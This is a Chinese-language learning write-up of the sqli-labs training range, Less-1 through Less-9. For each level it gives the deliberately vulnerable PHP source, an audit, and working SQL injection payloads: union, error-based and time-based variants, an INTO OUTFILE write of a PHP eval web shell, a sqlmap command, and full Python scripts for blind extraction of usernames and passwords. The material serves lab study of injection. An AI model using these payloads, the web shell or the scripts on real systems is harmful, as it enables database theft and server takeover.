参考文章 :作者:国光(大神偶像) 文章:《SQLI labs 靶场精简学习记录》
摘抄文章 :作者:ST0new (大佬) 文章:《sql-lab 通关Less1 -65(深入学习)》
项目地址:https://github.com/Audi-1/sqli-labs

我的环境为pte综合靶场(数据库系统为10.4.0-MariaDB,请综合参考)

游戏规则

刚开始玩 SQLI LAB ,我一开始不知道其目的是什么,怎么玩。简要说明一下吧,其目的是通过各种手动注入(sqlmap工具拿来检测就失去了本来的意义了),得到数据库中的敏感数据或全部数据。

基础挑战1~22

Less-1(基于错误的单引号字符串)

审计代码

源码

  1. <?php
  2. //include() 函数可获得指定文件中的所有文本,并把文本拷贝到使用 include 函数的文件中。
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  5. // 获取参数
  6. if(isset($_GET['id']))
  7. {
  8. $id=$_GET['id'];
  9. //日志存储
  10. $fp=fopen('result.txt','a');
  11. fwrite($fp,'ID:'.$id."\n");
  12. fclose($fp);
  14. // mysql链接
  17. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  18. $result=mysql_query($sql);
  19. $row = mysql_fetch_array($result);
  21.     if($row)
  22.     {
  23.       echo "<font size='5' color= '#99FF00'>";
  24.       echo 'Your Login name:'. $row['username'];
  25.       echo "<br>";
  26.       echo 'Your Password:' .$row['password'];
  27.       echo "</font>";
  28.       }
  29.     else 
  30.     {
  31.     echo '<font color= "#FFFF00">';
  32.     print_r(mysql_error());
  33.     echo "</font>";  
  34.     }
  35. }
  36.     else { echo "Please input the ID as parameter with numeric value";}
  38. ?>

关键代码审计

  1. # 单引号拼接,且
  2. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  4. # 支持联合、报错、布尔盲注、延时盲注
  5. if true:
  6.     输出查询内容
  7. else:
  8.     print_r(mysql_error());

联合注入查询

需要自己将payload拼接在URL后。之后不再赘述。

细化版(也就是ST0new版之后不再赘述)

  1. - 正常访问
  2. url?id=1
  4. - 添加 ' 
  5.     返回报错信息:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 0,1' at line 1
  7. - 使用 1' order by 3 %23
  8.     得到列数为3
  9. - %23在url中编码为#
  11. - 使用union 获取admin和password
  12. - GROUP_CONCAT()函数将组中的字符串连接成为具有各种选项的单个字符串(将多个值变为一个值返回)。
  14.     -1 的作用是查询不存在的值,使得结果为空
  15.     -1 ' union select 1,2,3 // 确定可以显示到页面的位置
  16.     -1 ' union select 1,2,group_concat(schema_name) from information_schema.schemata // 得到数据库名 或 通过database() 获取数据库名
  17.     -1 ' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' %23
  18.     -1 ' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users'%23
  19.     -1 ' union select 1,username,password from users %23

细化版实现

  1. -1'+union+select+1,2,3%23     --注意:直接输入'#'并不能注释,输入'%23'才可以,'--+'也可以进行注释

image.png

可以看到2,3参数回显(注意,union注入回显的数据类型是一致的,例如name,password是char类型,那么union注入得到的数据也应该为char类型等。

(这里有一个比较疑惑的是:既然2,3 都可以回显,那么 group_concat(schema_name) from information_schema.schemata 查询语句可以在2的位置,也可以在3的位置,但是实际中,语句只能在3的位置。如果想让语句在2的位置,需改为”(select+group_concat(schema_name) from information_schema.schemata)”才可以,百思不得其解呀,希望那天被有缘的大佬看到,解释一波,嘿嘿)

按照语法注入找到表后进行union注入即可过关

  1. http://sqli.pte.com/Less-1/?id=-1%27+union+select+1,2,group_concat(username,password)+from+users--+

image.png

Less-2 (基于错误的get整型注入)

知识点

mysql的注释符一般有三种
— , 单行注释
# 单行注释
/**/ 多行注释
注意— 不是注释符,–后还需要一个空格 ,而在web中 + 和空格等价,这就是为何我们注释符喜欢使用—+的原因

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  5. // take the variables
  6. if(isset($_GET['id']))
  7. {
  8. $id=$_GET['id'];
  9. //logging the connection parameters to a file for analysis.
  10. $fp=fopen('result.txt','a');
  11. fwrite($fp,'ID:'.$id."\n");
  12. fclose($fp);
  15. // connectivity 
  16. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  17. $result=mysql_query($sql);
  18. $row = mysql_fetch_array($result);
  20.     if($row)
  21.     {
  22.       echo "<font size='5' color= '#99FF00'>";
  23.       echo 'Your Login name:'. $row['username'];
  24.       echo "<br>";
  25.       echo 'Your Password:' .$row['password'];
  26.       echo "</font>";
  27.       }
  28.     else 
  29.     {
  30.     echo '<font color= "#FFFF00">';
  31.     print_r(mysql_error());
  32.     echo "</font>";  
  33.     }
  34. }
  35.     else
  36.         {     
  37.         echo "Please input the ID as parameter with numeric value";
  38.         }
  40. ?>

关键代码审计

  1. # 无单引号拼接,所以直接$id后面的语句注释即可(和Less-1的区别是id=$id处)
  2. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  4. if true:
  5.     输出查询内容
  6. else:
  7.     print_r(mysql_error());

联合注入查询(union注入)

  1. http://sqli.pte.com/Less-2/?id=-1+union+select+1,2,group_concat(username,password)+from+users--+

就是闭合方式不同,其他都一样,输入即可通关
图片.png

Less-3(基于错误的get单引号变形字符型注入)

知识点


这里普及一个知识点,如何不使用密码登录mysql,试想你拿到了一个用户的低权限账户,但是他对my.cnf 具有可写的权限,就可以通过修改my.cnf 进而登录数据库。如果数据库的存储方式可被允许,那么可以变像的提权。

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  5. // take the variables
  6. if(isset($_GET['id']))
  7. {
  8. $id=$_GET['id'];
  9. //logging the connection parameters to a file for analysis.
  10. $fp=fopen('result.txt','a');
  11. fwrite($fp,'ID:'.$id."\n");
  12. fclose($fp);
  14. // connectivity 
  17. $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
  18. $result=mysql_query($sql);
  19. $row = mysql_fetch_array($result);
  21.     if($row)
  22.     {
  23.       echo "<font size='5' color= '#99FF00'>";
  24.       echo 'Your Login name:'. $row['username'];
  25.       echo "<br>";
  26.       echo 'Your Password:' .$row['password'];
  27.       echo "</font>";
  28.       }
  29.     else 
  30.     {
  31.     echo '<font color= "#FFFF00">';
  32.     print_r(mysql_error());
  33.     echo "</font>";  
  34.     }
  35. }
  36.     else { echo "Please input the ID as parameter with numeric value";}
  38. ?>

关键代码审计

  1. # 区别是id=$id处,需要将('')闭合成功即可,所以闭合方式为')
  2. $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
  4. if true:
  5.     输出查询内容
  6. else:
  7.     print_r(mysql_error());

联合注入

  1. http://sqli.pte.com/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(username,password)+from+users--+

在 id=-1’) 处进行闭合
图片.png

Less-4(基于错误的GET双引号字符型注入)

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  5. // take the variables
  6. if(isset($_GET['id']))
  7. {
  8. $id=$_GET['id'];
  9. //logging the connection parameters to a file for analysis.
  10. $fp=fopen('result.txt','a');
  11. fwrite($fp,'ID:'.$id."\n");
  12. fclose($fp);
  14. // connectivity 
  16. $id = '"' . $id . '"';
  17. $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
  18. $result=mysql_query($sql);
  19. $row = mysql_fetch_array($result);
  21.     if($row)
  22.     {
  23.       echo "<font size='5' color= '#99FF00'>";
  24.       echo 'Your Login name:'. $row['username'];
  25.       echo "<br>";
  26.       echo 'Your Password:' .$row['password'];
  27.       echo "</font>";
  28.       }
  29.     else 
  30.     {
  31.     echo '<font color= "#FFFF00">';
  32.     print_r(mysql_error());
  33.     echo "</font>";  
  34.     }
  35. }
  36.     else { echo "Please input the ID as parameter with numeric value";}
  38. ?>

关键代码审计

  1. # 先双引号 在括号拼接
  2. $id = '"' . $id . '"';
  3. $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
  5. #其实相当于语句
  6. $sql="SELECT * FROM users WHERE id=("$id") LIMIT 0,1";
  8. if true:
  9.     输出查询内容
  10. else:
  11.     print_r(mysql_error());0.

联合注入

  1. http://sqli.pte.com/Less-4/?id=-1%22)%20union%20select%201,2,group_concat(username,password)+from+users%20--+

图片.png

Less-5(双注入GET单引号字符型注入)

知识点

报错注入:通过操作回显的报错信息来得到数据库中的数据

  1. as  别名 
  2. 顺便说几个常见的:
  3.         floor: 向下取整
  4.         ceiling: 向上取整
  5.       rand: 返回一个介于 0  1(不包括 0  1)之间的伪随机 float 
  6.       group by: GROUP BY必须得配合聚合函数来用,根据字段来分类
  7. - 使用
  8. select count(*) from [table] group by concat('~',([真正的查询语句]),'~'floor(rand(0)*2))
  10. select count(*),concat_ws(char(32,58,32),([查询语句]),floor(rand(0)*2)) as a from [table] group by a
  11. - 原理
  12. 简单来说就是count等聚合函数之后,如果使用分组语句,就会把查询的一部分以错误的形式显示出来

实例演示:

select concat(‘~’,(select database()),’~’) as a :
image.png

rand() :
image.png

floor(rand()*2) :
image.png

select concat(‘~’,(select database()),’~’,floor(rand()*2)) from users:
image.png
user表里有多少数据,就返回多少条

select count(), concat((select database()), floor(rand()2) as a from information_schema.schemata group by a
image.png
可以看到 floor(rand()2)的值是1的话没有报错,而floor(rand()2)为0时,在报错信息中出现了数据库的名称,假设存在报错回显则返回到了我们所看的页面中。

那么如果我们将 floor(rand()2) 改为 floor(rand(0)2) 则值就可以一直为0,则一直可以报错

审计代码

源码

  1. <?php
  2. //导入数据库参数
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  5. // take the variables
  6. if(isset($_GET['id']))
  7. {
  8. $id=$_GET['id'];
  9. //logging the connection parameters to a file for analysis.
  10. $fp=fopen('result.txt','a');
  11. fwrite($fp,'ID:'.$id."\n");
  12. fclose($fp);
  14. // connectivity 
  17. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  18. $result=mysql_query($sql);
  19. $row = mysql_fetch_array($result);
  21.     if($row)
  22.     {
  23.       echo '<font size="5" color="#FFFF00">';    
  24.       echo 'You are in...........';
  25.       echo "<br>";
  26.         echo "</font>";
  27.       }
  28.     else 
  29.     {
  31.     echo '<font size="3" color="#FFFF00">';
  32.     print_r(mysql_error());
  33.     echo "</br></font>";    
  34.     echo '<font color= "#0000ff" font size= 3>';    
  36.     }
  37. }
  38.     else { echo "Please input the ID as parameter with numeric value";}
  40. ?>

关键代码审计

  1. # 单引号拼接,且
  2. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  4. # 支持联合、报错、布尔盲注、延时盲注
  5. if true:
  6.     输出('You are in...........'
  7. else:
  8.     print_r(mysql_error());

双注入

原理有待补充
原理参考文章:https://www.jianshu.com/p/b502893dcc81

  1. -1' union all select count(*),2,concat( '~',(select schema_name from information_schema.schemata limit 4,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23     // 获取 数据库 security 这里最好实用union all 这样,否则需要多次访问才能获取回复
  2. -1' union all select count(*),1,concat( '~',(select table_name from information_schema.tables where table_schema = 'security' limit 3,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23 //获取表 users
  3. -1' union all select count(*),1,concat( '~',(select column_name from information_schema.columns where table_name= 'users' limit 2,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23  // 这里爆出了他三个字段,注意如果字段不存在也是返回you are in 
  4. -1' union all select count(*),1,concat( '~',(select concat(id,username,password) from users limit 2,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23  // 成功拿到 password username

拿到一个username和password
image.png

报错注入

上面的双注入研究麻了,这道题还可以运用updatexml()函数进行报错注入

  1. 爆数据库版本信息
  2. ?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
  4. 链接用户
  5. ?id=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
  7. 链接数据库
  8. ?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
  11. 爆表名
  12. ?id=1' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~'),1)--+
  14. 爆字段
  15. ?id=1' and updatexml(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),'~'),1)--+
  16. ?id=1' and updatexml(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),'~'),1)--+
  17. ?id=1' and updatexml(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),'~'),1)--+
  19. 爆字段内容
  20. ?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1),0x7e),1)--+
  21. 或者联系上文
  22. ?id=-1' and updatexml(1,(select group_concat(username,password)+from+users),1)--+

image.png

Less-6 (双注入GET双引号字符型注入)

没有什么好说的,更改闭合方式即可直接看代码吧

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  5. // take the variables
  6. if(isset($_GET['id']))
  7. {
  8. $id=$_GET['id'];
  9. //logging the connection parameters to a file for analysis.
  10. $fp=fopen('result.txt','a');
  11. fwrite($fp,'ID:'.$id."\n");
  12. fclose($fp);
  14. // connectivity 
  16. $id = '"'.$id.'"';
  17. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  18. $result=mysql_query($sql);
  19. $row = mysql_fetch_array($result);
  21.     if($row)
  22.     {
  23.       echo '<font size="5" color="#FFFF00">';    
  24.       echo 'You are in...........';
  25.       echo "<br>";
  26.       echo "</font>";
  27.       }
  28.     else 
  29.     {
  31.     echo '<font size="3"  color= "#FFFF00">';
  32.     print_r(mysql_error());
  33.     echo "</br></font>";    
  34.     echo '<font color= "#0000ff" font size= 3>';    
  36.     }
  37. }
  38.     else { echo "Please input the ID as parameter with numeric value";}
  40. ?>

关键代码审计

  1. # 双引号拼接,且
  2. $sql="SELECT * FROM users WHERE id="$id" LIMIT 0,1";
  4. # 支持联合、报错、布尔盲注、延时盲注
  5. if true:
  6.     输出('You are in...........'
  7. else:
  8.     print_r(mysql_error());

双注入

  1. -1" union all select count(*),1,concat( '~',(select concat(id,username,password) from users limit 2,1),'~',floor(rand()*2)) as a from information_schema.schemata group by a %23

image.png
报错注入也一样,更改闭合方式即可

Less-7 (导出文件GET字符型注入)

知识点

  1. - 正常访问
  2.     id=1
  3.      You are in.... Use outfile......
  4. - 看来这题是要导出文件
  5.     sqlmap 也可以执行相同的工作 这里就不解释了。
  6.     使用outfile 写入到服务器,我们一般可以利用这个漏洞写入一句话马
  7.     这里需要有两个已知项 1 字段值 2 绝对地址
  8.     并且 系统必须有可读可写,在服务器上,完整的路径,
  9.     导出命令: union select 1,2,3 into outfile "绝对地址" %23
  10. - paylaod
  11.     // 一般web都存放在默认的目录下,比如:
  12.         1 c:/inetpub/wwwroot/
  13.         2 linuxnginx一般是/usr/local/nginx/html
  14.         3 /home/wwwroot/default
  15.         4 /usr/share/nginx
  16.         5 /var/www/html
  17.     然后 验证是否具有这几个条件
  18.     1 获取文件权限的可读
  19.     1')) and (select count(*) from mysql.user)>0 %23
  20.     2 注入文件
  21.     这里要求猜一下他的绝对路径
  22.     id=-1')) union select 1,2,3 into outfile "\\xxx\\1.txt" %23
  23.     之后使用
  24.     id=-1')) union select 1,"<?php @eval($_POST['giantbranch']);?>" into outfile "XXX\test.php" %23
  26.     这里由于是使用docker,没有写成功

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  5. // take the variables
  6. if(isset($_GET['id']))
  7. {
  8. $id=$_GET['id'];
  9. //logging the connection parameters to a file for analysis.
  10. $fp=fopen('result.txt','a');
  11. fwrite($fp,'ID:'.$id."\n");
  12. fclose($fp);
  14. // connectivity 
  17. $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
  18. $result=mysql_query($sql);
  19. $row = mysql_fetch_array($result);
  21.     if($row)
  22.     {
  23.       echo '<font color= "#FFFF00">';    
  24.       echo 'You are in.... Use outfile......';
  25.       echo "<br>";
  26.       echo "</font>";
  27.       }
  28.     else 
  29.     {
  30.     echo '<font color= "#FFFF00">';
  31.     echo 'You have an error in your SQL syntax';
  32.     //print_r(mysql_error());                   #注释掉了报错,所以不可用
  33.     echo "</font>";  
  34.     }
  35. }
  36.     else { echo "Please input the ID as parameter with numeric value";}
  38. ?>

关键代码审计

  1. # 双括号和单引号拼接
  2. $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
  4. 抽象化
  5. if true:
  6.     输出('You are in...........'
  7. else:
  8.     输出 ("You have an error in your SQL syntax")
  9.     //print_r(mysql_error())

文件导出注入

在输入Centos虚拟机的绝对路径后,注入失败了,有待研究

sqlmap布尔盲注

  1. sqlmap -u "url/?id=1" --dbms=MySQL --random-agent --flush-session --technique=B -v 3

Less-8 (布尔型单引号GET盲注)

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  5. // take the variables
  6. if(isset($_GET['id']))
  7. {
  8. $id=$_GET['id'];
  9. //logging the connection parameters to a file for analysis.
  10. $fp=fopen('result.txt','a');
  11. fwrite($fp,'ID:'.$id."\n");
  12. fclose($fp);
  14. // connectivity 
  17. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  18. $result=mysql_query($sql);
  19. $row = mysql_fetch_array($result);
  21.     if($row)
  22.     {
  23.       echo '<font size="5" color="#FFFF00">';    
  24.       echo 'You are in...........';
  25.       echo "<br>";
  26.         echo "</font>";
  27.       }
  28.     else 
  29.     {
  31.     echo '<font size="5" color="#FFFF00">';
  32.     //echo 'You are in...........';
  33.     //print_r(mysql_error());
  34.     //echo "You have an error in your SQL syntax";
  35.     echo "</br></font>";    
  36.     echo '<font color= "#0000ff" font size= 3>';    
  38.     }
  39. }
  40.     else { echo "Please input the ID as parameter with numeric value";}
  42. ?>

关键代码审计

  1. # 单引号拼接,且
  2. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  4. # 布尔盲注
  5. if true:
  6.     输出('You are in...........')
  7. else:
  8.     无输出

布尔盲注

手动注入还是很累的,这里用python代码或者用burpsuite也是能出的

  1. from urllib import request
  2. from urllib import parse
  3. import re
  5. url = "http://sqli.pte.com/Less-8/?id="
  7. #1 查数据库
  8. # def length():
  9. database_length = 0
  10. while True:
  11.     param = "1' and length(database()) ="+str(database_length)+" #"
  12.     response = request.urlopen(url+ parse.quote(param)).read().decode()
  14.     if (re.search("You are in",response)):
  15.         #print("DATABASE_LENGTH:"+str(database_length))
  16.         break
  17.     else:
  18.         database_length += 1
  20. # db_name = ""
  21. # for l in range(database_length):
  22. #     for a in range(128):
  23. #         param = "1' and ascii(substr(database(),"  +  str(l+1) +  "))="  +  str(a) +  "#"
  24. #         response = request.urlopen(url + parse.quote(param)).read().decode()
  25. #         if (re.search("You are in",response)):
  26. #             db_name += chr(a)
  27. #             break
  28. # print("[*]:"+db_name)
  30. #尝试二分法扫描
  31. db_name = ""
  32. for l in range(database_length):
  33.     a,b = 64,64
  34.     while True:
  35.         b = int(b/2)
  36.         param = "1' and ascii(substr(database(),"  +  str(l+1) +  "))<"  +  str(a) +  "#"
  37.         response = request.urlopen(url + parse.quote(param)).read().decode()
  38.         if (re.search("You are in",response)):
  39.             a -=b
  40.         else:
  41.             param = "1' and ascii(substr(database(),"+str(l+1)+")) ="+str(a)+" #"
  42.             response = request.urlopen(url + parse.quote(param)).read().decode()
  43.             if (re.search("You are in",response)):
  44.                 db_name += chr(a)
  45.                 break
  46.             else:
  47.                 a +=b
  48. print("db_name:"+ db_name)
  49. print('table:')
  50. #2 查表数量
  51. table_num = 0
  53. while True:
  54.     param = "1' and (select count(*) from information_schema.tables where table_schema=database())="+str(table_num)+" #"
  55.     response = request.urlopen(url + parse.quote(param)).read().decode()
  57.     if (re.search("You are in",response)):
  58.         #print("table_num:"+str(table_num))
  59.         break
  60.     else:
  61.         table_num += 1
  63. # 查 表长度
  64. def ta_length(num):
  65.     table_length = 0
  66.     while True:
  67.         param = "1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(num)+",1),1))="+str(table_length)+" #"
  68.         response = request.urlopen(url + parse.quote(param)).read().decode()
  70.         if (re.search("You are in",response)):
  71.             return table_length
  72.             break
  73.         else:
  74.             table_length += 1
  75. # 查表
  76. for n in range(table_num):
  77.     table_name =""
  78.     for l  in range(ta_length(n)): # 表的长度
  79.         for a in range(0,128): #爆破表
  80.             param = "1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(n)+",1),"+str(l+1)+",1)) ="+str(a)+" #"
  81.             response = request.urlopen(url + parse.quote(param)).read().decode()
  82.             if (re.search("You are in", response)):
  83.                 table_name += chr(a)
  84.                 break
  85.     print("[*]:" + table_name)
  87. # 3 查字段
  88. # 查字段个数
  89. columns_num = 0
  90. while True:
  91.     param = "1' and (select count(*) from information_schema.columns where table_name='users')="+str(columns_num)+" #"
  92.     response = request.urlopen(url + parse.quote(param)).read().decode()
  94.     if (re.search("You are in",response)):
  95.         print("columns:"+str(columns_num))
  96.         break
  97.     else:
  98.         columns_num += 1
  100. # 查每个字段的长度
  101. def co_length(num):
  102.     columns_length = 0
  103.     while True:
  104.         param = "1' and length(substr((select column_name from information_schema.columns where table_name='users' limit "+str(num)+",1),1))="+str(columns_length)+" #"
  105.         response = request.urlopen(url + parse.quote(param)).read().decode()
  107.         if (re.search("You are in",response)):
  108.             #print(columns_length)
  109.             return columns_length
  110.             break
  111.         else:
  112.             columns_length += 1
  113. # 查每个字段的值
  114. for n in range(columns_num):
  115.     columns_name =""
  116.     for l  in range(co_length(n)): # 表的长度
  117.         for a in range(0,128): #爆破表
  118.             param = "1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(n)+",1),"+str(l+1)+",1)) ="+str(a)+" #"
  119.             response = request.urlopen(url + parse.quote(param)).read().decode()
  120.             if (re.search("You are in", response)):
  121.                 columns_name += chr(a)
  122.                 break
  123.     print("[*]:" +columns_name)
  125. # 下载数据
  127. # 查 username
  129. num = 0
  130. while True:
  131.     param = "1' and (select count(*) from users )= "+str(num)+"#"
  132.     response = request.urlopen(url + parse.quote(param)).read().decode()
  134.     if (re.search("You are in",response)):
  135.         print("num:"+str(num))
  136.         break
  137.     else:
  138.         num += 1
  140. def length(num):
  141.     user_length = 0
  142.     while True:
  143.         param = "1' and length(substr((select username from users limit "+str(num)+",1),1))="+str(user_length)+" #"
  144.         response = request.urlopen(url + parse.quote(param)).read().decode()
  146.         if (re.search("You are in",response)):
  147.             #print(user_length)
  148.             return user_length
  149.             break
  150.         else:
  151.             user_length += 1
  153. def Name(value1,value2):
  154.     for n in range(num):
  155.         columns_name =""
  156.         for l  in range(length(n)): # 表的长度
  157.             for a in range(0,128): #爆破表
  158.                 param = "1' and ascii(substr((select "+value1+" from users limit "+str(n)+",1),"+str(l+1)+",1)) ="+str(a)+" #"
  159.                 response = request.urlopen(url + parse.quote(param)).read().decode()
  160.                 if (re.search("You are in", response)):
  161.                     columns_name += chr(a)
  162.                     break
  163.         print("[*]:" +columns_name,end=":")
  164.         columns_name2 = ""
  165.         for l in range(length(n)):  # 表的长度
  166.             for a in range(0, 128):  # 爆破表
  167.                 param = "1' and ascii(substr((select " + value2 + " from users limit " + str(n) + ",1)," + str(
  168.                     l + 1) + ",1)) =" + str(a) + " #"
  169.                 response = request.urlopen(url + parse.quote(param)).read().decode()
  170.                 if (re.search("You are in", response)):
  171.                     columns_name2 += chr(a)
  172.                     break
  173.         print(columns_name2)
  175. Name("username","password")

成功爆破出用户名和密码
image.png

Less-9 (基于时间的GET单引号盲注)

知识点

  1. - 相关函数
  2.     这一关需要用到一个if函数 
  3.     IF(expr1,expr2,expr3) :既可以作为表达式用,也可在存储过程中作为流程控制语句使用
  4.     expr1 是判断条件 ,成立执行expr2 不成立执行 expr3
  5.     还有一个sleep(seconds) :执行延迟seconds

审计代码

源码

  1. <?php
  2. //including the Mysql connect parameters.
  3. include("../sql-connections/sql-connect.php");
  4. error_reporting(0);
  6. // take the variables
  7. if(isset($_GET['id']))
  8. {
  9. $id=$_GET['id'];
  10. //logging the connection parameters to a file for analysis.
  11. $fp=fopen('result.txt','a');
  12. fwrite($fp,'ID:'.$id."\n");
  13. fclose($fp);
  15. // connectivity 
  18. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  19. $result=mysql_query($sql);
  20. $row = mysql_fetch_array($result);
  22.     if($row)
  23.     {
  24.       echo '<font size="5" color="#FFFF00">';    
  25.       echo 'You are in...........';
  26.       echo "<br>";
  27.         echo "</font>";
  28.       }
  29.     else 
  30.     {
  32.     echo '<font size="5" color="#FFFF00">';
  33.     echo 'You are in...........';
  34.     //print_r(mysql_error());
  35.     //echo "You have an error in your SQL syntax";
  36.     echo "</br></font>";    
  37.     echo '<font color= "#0000ff" font size= 3>';    
  39.     }
  40. }
  41.     else { echo "Please input the ID as parameter with numeric value";}
  43. ?>

关键代码审计

  1. # 单引号拼接,且
  2. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  4. # 延时盲注
  5. if true:
  6.     输出('You are in...........')
  7. else:
  8.     输出('You are in...........')

时间盲注

  1. from urllib import request
  2. from urllib import parse
  3. from time import  time
  5. url = "http://sqli.pte.com/Less-9/?id="
  7. #1 查数据库
  8. database_length = 0
  9. while True:
  10.     param = "1' and if(length(database())="+str(database_length)+",sleep(0.1),1) #"
  11.     t = time()
  12.     response = request.urlopen(url + parse.quote(param))
  14.     if ( time() - t > 0.1 ):
  15.         print("DATABASE_LENGTH:"+str(database_length))
  16.         break
  17.     else:
  18.         database_length += 1
  21. db_name = ""
  22. for l in range(database_length):
  23.     for a in range(128):
  25.         param = "1' and if(ascii(substr(database(),"  +  str(l+1) +  "))="  +  str(a) + ",sleep(0.1),1) #"
  26.         t = time()
  27.         response = request.urlopen(url + parse.quote(param))
  29.         if (time()-t >0.1):
  30.             db_name += chr(a)
  31.             break
  32. print("[*]:"+db_name)
  34. '''
  35. #尝试二分法扫描
  36. db_name = ""
  37. for l in range(database_length):
  38.     a,b = 64,64
  39.     while True:
  40.         b = int(b/2)
  41.         param = "1' and ascii(substr(database(),"  +  str(l+1) +  "))<"  +  str(a) +  "#"
  42.         response = request.urlopen(url + parse.quote(param)).read().decode()
  43.         if (re.search("You are in",response)):
  44.             a -=b
  45.         else:
  46.             param = "1' and ascii(substr(database(),"+str(l+1)+")) ="+str(a)+" #"
  47.             response = request.urlopen(url + parse.quote(param)).read().decode()
  48.             if (re.search("You are in",response)):
  49.                 db_name += chr(a)
  50.                 break
  51.             else:
  52.                 a +=b
  53. print("db_name:"+ db_name)
  54. '''
  57. #2 查表数量
  58. table_num = 0
  60. while True:
  61.     param = "1 ' and if((select count(*) from information_schema.tables where table_schema=database())="+str(table_num)+",sleep(0.1),1) #"
  62.     t = time()
  63.     response = request.urlopen(url + parse.quote(param))
  64.     if (time() - t > 0.1 ):
  65.         print("table_num:"+str(table_num))
  66.         break
  67.     else:
  68.         table_num += 1
  70. # 查 表长度
  71. def ta_length(num):
  72.     table_length = 0
  73.     while True:
  74.         param = "1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(num)+",1),1))="+str(table_length)+",sleep(0.1),1) #"
  75.         t = time()
  76.         response = request.urlopen(url + parse.quote(param))
  77.         if (time() - t > 0.1 ):
  78.             return table_length
  79.             break
  80.         else:
  81.             table_length += 1
  83. # 查表
  84. for n in range(table_num):
  85.     table_name =""
  86.     for l  in range(ta_length(n)): # 表的长度
  87.         for a in range(0,128): #爆破表
  88.             param = "1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(n)+",1),"+str(l+1)+",1)) ="+str(a)+",sleep(0.1),1) #"
  89.             t = time()
  90.             response = request.urlopen(url + parse.quote(param))
  91.             if (time() - t > 0.1 ):
  92.                 table_name += chr(a)
  93.                 break
  94.     print("table_name:" + table_name)
  97. # 3 查字段
  98. # 查字段个数
  99. columns_num = 0
  100. while True:
  101.     param = "1' and if((select count(*) from information_schema.columns where table_name='users')="+str(columns_num)+",sleep(0.1),1) #"
  102.     t = time()
  103.     response = request.urlopen(url + parse.quote(param))
  104.     if (time() - t > 0.1):
  105.         print("columns_name:"+str(columns_num))
  106.         break
  107.     else:
  108.         columns_num += 1
  110. # 查每个字段的长度
  111. def co_length(num):
  112.     columns_length = 0
  113.     while True:
  114.         param = "1' and if(length(substr((select column_name from information_schema.columns where table_name='users' limit "+str(num)+",1),1))="+str(columns_length)+",sleep(0.1),1) #"
  115.         t = time()
  116.         response = request.urlopen(url + parse.quote(param))
  118.         if (time() - t > 0.1):
  119.             return columns_length
  120.             break
  121.         else:
  122.             columns_length += 1
  123. # 查每个字段的值
  124. for n in range(columns_num):
  125.     columns_name =""
  126.     for l  in range(co_length(n)): # 表的长度
  127.         for a in range(0,128): #爆破表
  128.             param = "1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(n)+",1),"+str(l+1)+",1)) ="+str(a)+",sleep(0.1),1) #"
  129.             t = time()
  130.             response = request.urlopen(url + parse.quote(param))
  131.             if (time() - t > 0.1):
  132.                 columns_name += chr(a)
  133.                 break
  134.     print("table_name:" +columns_name)
  136. # 下载数据
  138. # 查 username
  139. num = 0
  140. while True:
  141.     param = "1' and if((select count(*) from users )= "+str(num)+",sleep(0.1),1)#"
  142.     t = time()
  143.     response = request.urlopen(url + parse.quote(param)).read().decode()
  145.     if (time() - t > 0.1):
  146.         print("num:"+str(num))
  147.         break
  148.     else:
  149.         num += 1
